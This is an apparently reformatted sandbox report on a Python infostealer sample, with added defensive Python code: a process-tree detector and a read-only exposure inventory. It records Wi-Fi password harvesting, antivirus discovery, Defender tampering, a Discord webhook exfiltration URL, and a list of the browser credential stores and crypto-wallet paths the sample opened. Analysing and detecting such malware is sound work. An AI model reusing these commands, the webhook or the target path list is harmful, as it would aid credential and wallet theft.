Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll (1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat (1)
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ (2)
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ (1)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function 0_2_00007FF7B10FC590: GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function 0_2_00007FF7B1116950: _get_daylight, _get_daylight, _get_daylight, _get_daylight, _get_daylight, GetTimeZoneInformation
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function 72_2_00007FF71D2F48CC: GetModuleFileNameW, GetVersionExW, LoadLibraryW, LoadLibraryW
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe (command line: netsh wlan show profile)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI query: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
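Detection logic for the two behaviors above, added here as an example; it is neither part of the Joe Sandbox report nor code from the sample. It walks a process tree built from Sysmon-style process-creation events and flags "netsh wlan show profile" only when it is reached through cmd.exe from an ancestor running out of a user-writable directory, which is the chain the report records (sample on the Desktop, then cmd.exe /c "netsh wlan show profile", then netsh.exe), and flags a WMIC query of root\SecurityCenter2 AntivirusProduct from the same kind of origin. The events, the sample.exe name, the PIDs and the WMIC command line are constructed for the example: the report shows the WMI query as observed, not the command line that issued it.

```python
r"""Process-tree detection for: netsh wlan show profile reached through cmd.exe
from a parent in a user-writable directory, and a WMIC query of
root\SecurityCenter2 AntivirusProduct from such an origin.
Added example; events below are constructed in the style of Sysmon Event ID 1."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Locations a standard user can write to; the report's sample ran from Desktop.
USER_WRITABLE = re.compile(
    r"^[A-Z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE)
NETSH_WLAN_PROFILE = re.compile(r"\bnetsh(\.exe)?\s+wlan\s+show\s+profile\b", re.IGNORECASE)
# Antivirus discovery through the SecurityCenter2 WMI namespace.
SECURITYCENTER_AV = re.compile(r"root\\SecurityCenter2\b.*\bAntivirusProduct\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain of ev, nearest parent first; stops at unknown PIDs or cycles."""
    chain: List[ProcEvent] = []
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def user_path_origin(chain: List[ProcEvent]):
    """First ancestor whose image lives in a user-writable directory, else None."""
    return next((a for a in chain if USER_WRITABLE.match(a.image)), None)


def detect(events: List[ProcEvent]) -> List[dict]:
    """Alerts for the report's chains. An administrator running the same netsh
    command from an explorer-spawned shell produces none, because no ancestor
    runs from a user-writable path."""
    by_pid = {e.pid: e for e in events}
    alerts: List[dict] = []
    for ev in events:
        image = ev.image.lower()
        if image.endswith("\\netsh.exe") and NETSH_WLAN_PROFILE.search(ev.cmdline):
            chain = ancestors(ev, by_pid)
            via_cmd = bool(chain) and chain[0].image.lower().endswith("\\cmd.exe")
            origin = user_path_origin(chain)
            if via_cmd and origin is not None:
                alerts.append({"rule": "wlan_profile_harvest", "pid": ev.pid, "origin": origin.image})
        elif image.endswith("\\wmic.exe") and SECURITYCENTER_AV.search(ev.cmdline):
            origin = user_path_origin(ancestors(ev, by_pid))
            if origin is not None:
                alerts.append({"rule": "av_product_discovery", "pid": ev.pid, "origin": origin.image})
    return alerts


# Constructed events (not from the report): a stealer on the Desktop, with PIDs
# 7600/7656 mirroring the report, plus a benign administrator running the same
# netsh command from an interactive shell under explorer.exe.
SAMPLE_EVENTS = [
    ProcEvent(7600, 1000, r"C:\Users\user\Desktop\sample.exe", r"C:\Users\user\Desktop\sample.exe"),
    ProcEvent(7656, 7600, r"C:\Users\user\Desktop\sample.exe", r"C:\Users\user\Desktop\sample.exe"),
    ProcEvent(7700, 7656, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'),
    ProcEvent(7710, 7700, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
    ProcEvent(7720, 7656, r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"),
    ProcEvent(4000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 4000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(4110, 4100, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The parent-chain check is what keeps the rule quiet on help-desk use of netsh; a rule on the command line alone fires on every technician who exports a Wi-Fi profile. Feeding real Sysmon data means mapping Event ID 1's ProcessId, ParentProcessId, Image and CommandLine fields onto ProcEvent and keeping PID reuse in mind when the event window is long.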

Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: ereum\keystore
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Process created: C:\Windows\System32\cmd.exe (command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile")
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe (command line: netsh wlan show profile)
Files opened by C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, grouped by application:

Google Chrome, under C:\Users\user\AppData\Local\Google\Chrome\User Data\Default:
File opened: (the Default profile directory itself)
File opened: Login Data
File opened: Network\Cookies
File opened: History
File opened: Web Data
File opened: Local Storage\leveldb\000003.log
File opened: Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
File opened: Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
File opened: Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
File opened: Extension State
File opened: Extension Rules
File opened: Extension Scripts
File opened: blob_storage
File opened: blob_storage\c7615543-0de7-4eea-9862-59688b7f430d
File opened: Cache
File opened: Code Cache
File opened: Code Cache\js
File opened: Code Cache\js\index-dir
File opened: Code Cache\wasm
File opened: Code Cache\wasm\index-dir
File opened: DawnCache
File opened: databases
File opened: Download Service
File opened: Download Service\EntryDB
File opened: Download Service\Files
File opened: Feature Engagement Tracker
File opened: Feature Engagement Tracker\AvailabilityDB
File opened: AutofillStrikeDatabase
File opened: BudgetDatabase
File opened: coupon_db
File opened: commerce_subscription_db

Microsoft Edge, under C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default:
File opened: Login Data
File opened: Network\Cookies
File opened: History

Mozilla Firefox, under C:\Users\user\AppData\Roaming\Mozilla\Firefox:
File opened: Profiles
File opened: Profiles\3nxxd8pi.default-release
File opened: Profiles\3nxxd8pi.default-release\cookies.sqlite
File opened: Profiles\3nxxd8pi.default-release\places.sqlite
File opened: Profiles\3nxxd8pi.default-release\permissions.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage.sqlite
File opened: Profiles\3nxxd8pi.default-release\content-prefs.sqlite
File opened: Profiles\3nxxd8pi.default-release\protections.sqlite
File opened: Profiles\3nxxd8pi.default-release\favicons.sqlite
File opened: Profiles\3nxxd8pi.default-release\webappsstore.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
File opened: Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Cryptocurrency wallets (the count in parentheses is the number of identical entries in the report):
File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb (1)
File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (2)
File opened: C:\Users\user\AppData\Roaming\Electrum\wallets (1)
File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb (1)
File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb (1)
File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (2)

Source: Yara match | File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
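Exposure inventory for the artifact set above, added here as an example; it is not part of the report and not the sample's code. Given a user profile directory it reports which of the credential stores, cookie and history databases and wallet directories listed under "File opened" exist, and for a Chromium Login Data store it counts the saved logins a grabber would have reached by reading the logins table read-only. The demo profile built by build_demo_profile() is constructed test data, the category names are our own grouping, and the note that nkbihfbeogaeaoehlefnkodbefgpgknn is MetaMask's extension id comes from outside the report.

```python
"""Exposure inventory for the browser stores and wallet directories the report
lists under "File opened". Added example; the relative paths are the report's,
the categories are our own grouping."""
import sqlite3
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# (category, path relative to the user profile). "/" separators so that
# Path.glob works on every OS; "*" stands in for the Firefox profile name.
ARTIFACTS = [
    ("browser-credentials", "AppData/Local/Google/Chrome/User Data/Default/Login Data"),
    ("browser-credentials", "AppData/Local/Microsoft/Edge/User Data/Default/Login Data"),
    ("browser-cookies", "AppData/Local/Google/Chrome/User Data/Default/Network/Cookies"),
    ("browser-cookies", "AppData/Local/Microsoft/Edge/User Data/Default/Network/Cookies"),
    ("browser-cookies", "AppData/Roaming/Mozilla/Firefox/Profiles/*/cookies.sqlite"),
    ("browser-history", "AppData/Local/Google/Chrome/User Data/Default/History"),
    ("browser-history", "AppData/Local/Microsoft/Edge/User Data/Default/History"),
    ("browser-history", "AppData/Roaming/Mozilla/Firefox/Profiles/*/places.sqlite"),
    ("browser-autofill", "AppData/Local/Google/Chrome/User Data/Default/Web Data"),
    # Chrome storage of the MetaMask extension (id nkbihfbeogaeaoehlefnkodbefgpgknn).
    ("wallet", "AppData/Local/Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"),
    ("wallet", "AppData/Roaming/Exodus/exodus.wallet"),
    ("wallet", "AppData/Roaming/Electrum/wallets"),
    ("wallet", "AppData/Roaming/atomic/Local Storage/leveldb"),
    ("wallet", "AppData/Roaming/Guarda/Local Storage/leveldb"),
    ("wallet", "AppData/Local/Coinomi/Coinomi/wallets"),
    ("wallet", "AppData/Roaming/com.liberty.jaxx/IndexedDB/file_0.indexeddb.leveldb"),
]


def saved_login_count(login_data) -> Optional[int]:
    """Rows in the Chromium 'logins' table, opened read-only through a file: URI.
    Returns None when the file is locked by a running browser, missing, or not a
    Chromium password store. Password values stay encrypted in the file."""
    db = None
    try:
        db = sqlite3.connect(Path(login_data).resolve().as_uri() + "?mode=ro", uri=True)
        return db.execute("SELECT COUNT(*) FROM logins").fetchone()[0]
    except sqlite3.Error:
        return None
    finally:
        if db is not None:
            db.close()


def inventory(home) -> Dict[str, List[dict]]:
    """category -> artifacts present under `home` that the grabber would reach."""
    home = Path(home).resolve()
    found: Dict[str, List[dict]] = {}
    for category, pattern in ARTIFACTS:
        for hit in sorted(home.glob(pattern)):
            entry = {"path": hit.relative_to(home).as_posix()}
            if hit.name == "Login Data" and hit.is_file():
                entry["saved_logins"] = saved_login_count(hit)
            found.setdefault(category, []).append(entry)
    return found


def build_demo_profile(root) -> Path:
    """Constructed stand-in for a user profile (not real data): one Chrome
    password store with two saved logins, one Firefox profile, one Exodus wallet."""
    home = Path(root)
    chrome = home / "AppData/Local/Google/Chrome/User Data/Default"
    chrome.mkdir(parents=True)
    db = sqlite3.connect(chrome / "Login Data")
    db.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    db.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://example.test", "alice", b"v10-encrypted"),
        ("https://mail.example.test", "alice", b"v10-encrypted"),
    ])
    db.commit()
    db.close()
    firefox = home / "AppData/Roaming/Mozilla/Firefox/Profiles/abcd1234.default-release"
    firefox.mkdir(parents=True)
    (firefox / "places.sqlite").touch()
    (home / "AppData/Roaming/Exodus/exodus.wallet").mkdir(parents=True)
    return home


def demo() -> Dict[str, List[dict]]:
    """Inventory of the constructed profile, built in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return inventory(build_demo_profile(tmp))


if __name__ == "__main__":
    for category, entries in demo().items():
        for entry in entries:
            print(category, entry)
```

On an affected account, run inventory(Path.home()) and treat every hit as data the sample had read access to. When the browser is running, Login Data is usually locked and saved_logins comes back as None; copy the file (or read it from a shadow copy) before counting. The count, not the content, is what drives credential rotation: the password values remain encrypted in the database and are not decrypted here.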

Remote Access Functionality

Source: Yara match | File source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
MITRE ATT&CK Matrix

The number in parentheses is the count the report attaches to the technique; only techniques carrying a count are listed. Tactics for which no technique carries a count are marked "none".

Reconnaissance: none
Resource Development: none
Initial Access: none
Execution: Windows Management Instrumentation (241); Native API (1); Command and Scripting Interpreter (112); PowerShell (3)
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (4); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (11); DLL Side-Loading (1); Virtualization/Sandbox Evasion (141); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (1)
Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (47); Security Software Discovery (151); Process Discovery (2); Virtualization/Sandbox Evasion (141); Application Window Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1); Data from Local System (3); Clipboard Data (1)
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (5)
Exfiltration: none
Impact: Data Encrypted for Impact (1); System Shutdown/Reboot (1)
Behavior Graph

Behavior Graph ID: 1446241
Sample: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Start date: 23/05/2024
Architecture: WINDOWS
Score: 100

Start
  DNS: discord.com; ip-api.com
  Signatures: Found malware configuration; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 13 other signatures
  -> SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (node 11)
     Dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+); C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 16 other files (none is malicious)
     Signatures: Very long command line found; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; 2 other signatures
     -> SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (node 15)
        Network: discord.com 162.159.135.232, remote port 443, local port 49715 (CLOUDFLARENETUS, United States); ip-api.com 208.95.112.1, remote port 80, local port 49714 (TUT-ASUS, United States)
        Signatures: Very long command line found; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 6 other signatures
        -> cmd.exe (node 19)
           Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; 2 other signatures
           -> powershell.exe (node 28)
           -> conhost.exe (node 31)
        -> cmd.exe (node 22)
           Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
           -> powershell.exe (node 33)
              Signatures: Loading BitLocker PowerShell Module
           -> 2 other processes (node 41)
        -> cmd.exe (node 24)
           -> 2 other processes (node 43)
              Dropped: C:\Users\user\AppData\...\c3m2uwl3.cmdline (Unicode)
              -> csc.exe (node 48)
                 Dropped: C:\Users\user\AppData\Local\...\c3m2uwl3.dll (PE32)
                 -> cvtres.exe (node 51)
        -> 24 other processes (node 26)
           Signatures: Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords
           -> getmac.exe (node 35)
              Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
           -> powershell.exe (node 37)
           -> systeminfo.exe (node 39)
           -> 45 other processes (node 46)
              Dropped: C:\Users\user\AppData\Local\Temp\R9FJX.zip (RAR)

Source | Detection | Scanner | Label
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | 58% | ReversingLabs | Win64.Trojan.Lazy
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | 100% | Avira | HEUR/AGEN.1351111
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd | 0% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.135.232 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC | true | Avira URL Cloud: safe | unknown
                  • Avira URL Cloud: safe
                  unknown
                  http://google.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765146576.0000016197067000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.sectigo.com0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, rar.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.python.org/download/releases/2.3/mro/.SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764313337.00000161965B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 0000002D.00000002.1611004763.0000014D1A58A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://discordapp.com/api/v9/users/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SecuriteInfo.com.Python.Muldrop.18.23042.15901.exefalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/urllib3/urllib3/issues/2920SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329121115.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://yahoo.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.00000161970A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1372221043.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1385557647.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765347451.00000161970AE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1762649587.00000161970AC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766262615.000001619731F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379967159.0000016197320000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970B3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://account.bellmedia.cSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767792449.0000016198484000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766436542.00000161973D6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379967159.00000161973D6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1460488470.00000161973D6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329121115.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
